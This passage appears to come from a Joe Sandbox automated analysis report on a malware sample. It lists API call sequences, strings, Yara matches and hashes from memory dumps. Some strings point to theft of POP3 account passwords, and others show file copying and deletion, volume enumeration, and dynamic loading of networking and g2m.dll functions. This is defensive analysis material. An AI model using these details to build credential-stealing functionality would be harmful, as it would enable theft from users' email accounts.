                                                                                                                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00079505
                                                                                                                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0007950F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                • String ID: alias audio$" type $P)$P)$P)$`!Yt$close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                                                                                                • API String ID: 738084811-1747748789
                                                                                                                                                                • Opcode ID: 29c333a06e99dec74908ac9bb13eb30342b59baf7a4c5bc01807fd2dc36bc0f8
                                                                                                                                                                • Instruction ID: 6266d6ab396583f5d6740adbe27fc894688ee43ade48eaa753a5d3a1284727e0
                                                                                                                                                                • Opcode Fuzzy Hash: 29c333a06e99dec74908ac9bb13eb30342b59baf7a4c5bc01807fd2dc36bc0f8
                                                                                                                                                                • Instruction Fuzzy Hash: 3C51C271B001087EEB14B7A4EC92DFE7BAEEF40744B04812EF50657192DF284E49C7A6
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                                                                  • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                                                                  • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                                                                • _strlen.LIBCMT ref: 10001855
                                                                                                                                                                • _strlen.LIBCMT ref: 10001869
                                                                                                                                                                • _strlen.LIBCMT ref: 1000188B
                                                                                                                                                                • _strlen.LIBCMT ref: 100018AE
                                                                                                                                                                • _strlen.LIBCMT ref: 100018C8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strlen$File$CopyCreateDelete
                                                                                                                                                                • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                • API String ID: 3296212668-3023110444
                                                                                                                                                                • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                                                                • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6FE746C0: SetLastError.KERNEL32(00000000), ref: 6FE74783
                                                                                                                                                                  • Part of subcall function 6FE746C0: GetCurrentDirectoryW.KERNEL32(00000000,00000002), ref: 6FE7478B
                                                                                                                                                                  • Part of subcall function 6FE746C0: GetLastError.KERNEL32 ref: 6FE74797
                                                                                                                                                                  • Part of subcall function 6FE746C0: GetLastError.KERNEL32 ref: 6FE747A9
                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 6FE790DE
                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 6FE790E7
                                                                                                                                                                • RtlCaptureContext.KERNEL32(?), ref: 6FE79107
                                                                                                                                                                • GetProcAddress.KERNEL32(SymFunctionTableAccess64), ref: 6FE79149
                                                                                                                                                                • GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6FE79173
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6FE79188
                                                                                                                                                                • GetProcAddress.KERNEL32(StackWalkEx), ref: 6FE791AB
                                                                                                                                                                • ReleaseMutex.KERNEL32(?), ref: 6FE792D1
                                                                                                                                                                • GetProcAddress.KERNEL32(StackWalk64), ref: 6FE79404
                                                                                                                                                                Strings
                                                                                                                                                                • note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...], xrefs: 6FE792F8
                                                                                                                                                                • stack backtrace:, xrefs: 6FE79063
                                                                                                                                                                • SymGetModuleBase64, xrefs: 6FE79168
                                                                                                                                                                • StackWalk64, xrefs: 6FE793F9
                                                                                                                                                                • StackWalkEx, xrefs: 6FE791A0
                                                                                                                                                                • SymFunctionTableAccess64, xrefs: 6FE7913E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressCurrentProc$ErrorLast$Process$CaptureContextDirectoryMutexReleaseThread
                                                                                                                                                                • String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...]$stack backtrace:
                                                                                                                                                                • API String ID: 1741357895-2373373428
                                                                                                                                                                • Opcode ID: 694f87f5955906abe9d3278254a3392aea64e9985ac01c6957c32050e1bee662
                                                                                                                                                                • Instruction ID: 663652eab98a87918438f2d089e518ec77e8cb86d2c1e727c821e45477cc3450
                                                                                                                                                                • Opcode Fuzzy Hash: 694f87f5955906abe9d3278254a3392aea64e9985ac01c6957c32050e1bee662
                                                                                                                                                                • Instruction Fuzzy Hash: A4E127B0500B009FE731CF25C885B87BBF5BF06718F20891DE9AA8B691EB71B459CB51
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strlen
                                                                                                                                                                • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                • API String ID: 4218353326-230879103
                                                                                                                                                                • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                                                                • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3899193279-0
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenW.KERNEL32(?,00000000,?), ref: 0007A1A5
                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 0007A1CD
                                                                                                                                                                • FindFirstVolumeW.KERNEL32(?,00000104), ref: 0007A1F4
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0007A202
                                                                                                                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0007A278
                                                                                                                                                                • lstrcmpW.KERNEL32(?,?), ref: 0007A291
                                                                                                                                                                • FindNextVolumeW.KERNEL32(00000018,?,00000104), ref: 0007A2AA
                                                                                                                                                                • FindVolumeClose.KERNEL32(00000018), ref: 0007A2EA
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0007A2FE
                                                                                                                                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,00000105,00000105), ref: 0007A330
                                                                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 0007A348
                                                                                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 0007A356
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0007A35E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuerylstrcatlstrcmplstrcpy
                                                                                                                                                                • String ID: ?
                                                                                                                                                                • API String ID: 1756451316-1684325040
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$___from_strstr_to_strchr_wcschr
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1963305004-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetCommandLineW.KERNEL32 ref: 0040102E
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 004010E5
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004010ED
                                                                                                                                                                • GetStartupInfoW.KERNEL32(?), ref: 0040110F
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00401124
                                                                                                                                                                • GetModuleHandleA.KERNEL32(g2m.dll), ref: 004012B0
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004012DD
                                                                                                                                                                • MessageBoxA.USER32(00000000,004020D0,004020F8,00001010), ref: 00401365
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0040136E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4485529625.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4485433706.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4486274195.0000000000402000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4486390294.0000000000405000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Module$ExitHandleProcess$AddressCommandFileInfoLineMessageNameProcStartup
                                                                                                                                                                • String ID: @$L @$g2m.dll$ @
                                                                                                                                                                • API String ID: 195749359-3595644552
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$Info
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2509303402-0
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0007310A
                                                                                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00073150
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0007316A
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00000000,00000000), ref: 00073175
                                                                                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000731B2
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 000731C4
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000731CF
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,000C8568), ref: 000731DE
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000731F5
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                                                                • String ID: \ws2_32$\wship6$getaddrinfo
                                                                                                                                                                • API String ID: 2490988753-3078833738
                                                                                                                                                                APIs
                                                                                                                                                                • _free.LIBCMT ref: 0259CC47
                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 0259CC52
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259CF3F
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259CF51
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259CF63
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259CF75
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259CF87
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259CF99
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259CFAB
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259CFBD
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259CFCF
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259CFE1
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259CFF3
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259D005
                                                                                                                                                                  • Part of subcall function 0259CF22: _free.LIBCMT ref: 0259D017
                                                                                                                                                                • _free.LIBCMT ref: 0259CC69
                                                                                                                                                                • _free.LIBCMT ref: 0259CC7E
                                                                                                                                                                • _free.LIBCMT ref: 0259CC89
                                                                                                                                                                • _free.LIBCMT ref: 0259CCAB
                                                                                                                                                                • _free.LIBCMT ref: 0259CCBE
                                                                                                                                                                • _free.LIBCMT ref: 0259CCCC
                                                                                                                                                                • _free.LIBCMT ref: 0259CCD7
                                                                                                                                                                • _free.LIBCMT ref: 0259CD0F
                                                                                                                                                                • _free.LIBCMT ref: 0259CD16
                                                                                                                                                                • _free.LIBCMT ref: 0259CD33
                                                                                                                                                                • _free.LIBCMT ref: 0259CD4B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$___free_lconv_mon
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3658870901-0
                                                                                                                                                                • Opcode ID: 0e241020917a581edb4b2dbb372553fe3ffbd6d6578403ff0f0c2547304029ed
                                                                                                                                                                • Instruction ID: bc6672c03f189e7e93325254395d0cf4303b48284f283ddbe475312cdac8b338
                                                                                                                                                                • Opcode Fuzzy Hash: 0e241020917a581edb4b2dbb372553fe3ffbd6d6578403ff0f0c2547304029ed
                                                                                                                                                                • Instruction Fuzzy Hash: 0A3193315007029FEF24AB38D844B567BEAFF48366F14896AE469D7160DF35E840DB5C
                                                                                                                                                                APIs
                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                                                • _free.LIBCMT ref: 10007CFB
                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                • _free.LIBCMT ref: 10007D1D
                                                                                                                                                                • _free.LIBCMT ref: 10007D32
                                                                                                                                                                • _free.LIBCMT ref: 10007D3D
                                                                                                                                                                • _free.LIBCMT ref: 10007D5F
                                                                                                                                                                • _free.LIBCMT ref: 10007D72
                                                                                                                                                                • _free.LIBCMT ref: 10007D80
                                                                                                                                                                • _free.LIBCMT ref: 10007D8B
                                                                                                                                                                • _free.LIBCMT ref: 10007DC3
                                                                                                                                                                • _free.LIBCMT ref: 10007DCA
                                                                                                                                                                • _free.LIBCMT ref: 10007DE7
                                                                                                                                                                • _free.LIBCMT ref: 10007DFF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                                • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                                                • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                                                APIs
                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 000AD1E7
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD4D4
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD4E6
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD4F8
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD50A
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD51C
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD52E
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD540
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD552
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD564
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD576
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD588
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD59A
                                                                                                                                                                  • Part of subcall function 000AD4B7: _free.LIBCMT ref: 000AD5AC
                                                                                                                                                                • _free.LIBCMT ref: 000AD1DC
                                                                                                                                                                  • Part of subcall function 000A1E15: RtlFreeHeap.NTDLL(00000000,00000000,?,000A0866,00000001,00000001), ref: 000A1E2B
                                                                                                                                                                  • Part of subcall function 000A1E15: GetLastError.KERNEL32(AC02BBF3,?,000A0866,00000001,00000001), ref: 000A1E3D
                                                                                                                                                                • _free.LIBCMT ref: 000AD1FE
                                                                                                                                                                • _free.LIBCMT ref: 000AD213
                                                                                                                                                                • _free.LIBCMT ref: 000AD21E
                                                                                                                                                                • _free.LIBCMT ref: 000AD240
                                                                                                                                                                • _free.LIBCMT ref: 000AD253
                                                                                                                                                                • _free.LIBCMT ref: 000AD261
                                                                                                                                                                • _free.LIBCMT ref: 000AD26C
                                                                                                                                                                • _free.LIBCMT ref: 000AD2A4
                                                                                                                                                                • _free.LIBCMT ref: 000AD2AB
                                                                                                                                                                • _free.LIBCMT ref: 000AD2C8
                                                                                                                                                                • _free.LIBCMT ref: 000AD2E0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                                • Opcode ID: 1544fbf7d9b4f7ba5ad65e8032435e798945f6a4ade9d520896dc9b97c8d691f
                                                                                                                                                                • Instruction ID: 9d3455e5aae988e12ce465f633611b1af4b952d368a00e24b0c2dd30218ec6bc
                                                                                                                                                                • Opcode Fuzzy Hash: 1544fbf7d9b4f7ba5ad65e8032435e798945f6a4ade9d520896dc9b97c8d691f
                                                                                                                                                                • Instruction Fuzzy Hash: CA315C31600704AFEB60AAF8D845BDA73E9AF23310F14452AF85AD7552DF35ED90CB10
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                • Opcode ID: 1a5ca54b36596ad37749563d119fc4e68a20727be45026b500f5852c660b9b47
                                                                                                                                                                • Instruction ID: f1ff88654b17854cc2ce964825c2bc6d0d783d9a3643944f8295fb90dcb7a816
